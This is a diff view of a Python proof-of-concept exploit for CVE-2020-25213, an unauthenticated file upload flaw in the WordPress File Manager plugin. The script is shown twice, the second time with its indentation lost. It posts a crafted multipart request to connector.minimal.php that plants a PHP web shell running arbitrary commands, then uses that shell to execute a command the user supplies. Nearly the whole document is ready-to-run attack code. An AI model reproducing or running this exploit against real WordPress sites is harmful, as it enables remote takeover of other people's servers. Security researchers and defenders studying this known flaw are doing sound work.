hutgrabber · January 20, 2024 17:53 · hutgrabber · Jan 20, 2024
diff --git a/POC-Shrey.py b/POC-Shrey.py
 #!/usr/bin/env

 # Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
 # Date: [ 22-01-2023 ]
 # Exploit Author: [BLY]
 # Vendor Homepage: [https://wpscan.com/vulnerability/10389]
 # Version: [ File Manager plugin 6.0-6.9]
 # Tested on: [ Debian ]
 # CVE : [ CVE-2020-25213 ]

 import sys,signal,time,requests
 from bs4 import BeautifulSoup
 #from pprint import pprint

 def handler(sig,frame):
 	print ("[!]Saliendo")
 	sys.exit(1)

 signal.signal(signal.SIGINT,handler)

 def commandexec(command):

 	exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
 	params = {
 		"cmd":command
 	}

 	r=requests.get(exec_url,params=params)

 	soup = BeautifulSoup(r.text, 'html.parser')
 	text = soup.get_text()

 	print (text)
 def exploit():

 	global url

 	url = sys.argv[1]
 	command = sys.argv[2]
 	upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

 	headers = {
 			'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
 			'Connection': "close"
 	}

 	payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

 	try:
 		r=requests.post(upload_url,data=payload,headers=headers)
 		#pprint(r.json())
 		commandexec(command)
 	except:
 		print("[!] Algo ha salido mal...")




 def help():

 	print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
 	print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")




 if __name__ == '__main__':

 	if len(sys.argv) != 3:
 		help()

 	else:
 		exploit()
	#!/usr/bin/env

	# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
	# Date: [ 22-01-2023 ]
	# Exploit Author: [BLY]
	# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
	# Version: [ File Manager plugin 6.0-6.9]
	# Tested on: [ Debian ]
	# CVE : [ CVE-2020-25213 ]

	import sys,signal,time,requests
	from bs4 import BeautifulSoup
	#from pprint import pprint

	def handler(sig,frame):
	print ("[!]Saliendo")
	sys.exit(1)

	signal.signal(signal.SIGINT,handler)

	def commandexec(command):

	exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
	params = {
	"cmd":command
	}

	r=requests.get(exec_url,params=params)

	soup = BeautifulSoup(r.text, 'html.parser')
	text = soup.get_text()

	print (text)
	def exploit():

	global url

	url = sys.argv[1]
	command = sys.argv[2]
	upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

	headers = {
	'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
	'Connection': "close"
	}

	payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

	try:
	r=requests.post(upload_url,data=payload,headers=headers)
	#pprint(r.json())
	commandexec(command)
	except:
	print("[!] Algo ha salido mal...")




	def help():

	print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
	print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")




	if __name__ == '__main__':

	if len(sys.argv) != 3:
	help()

	else:
	exploit()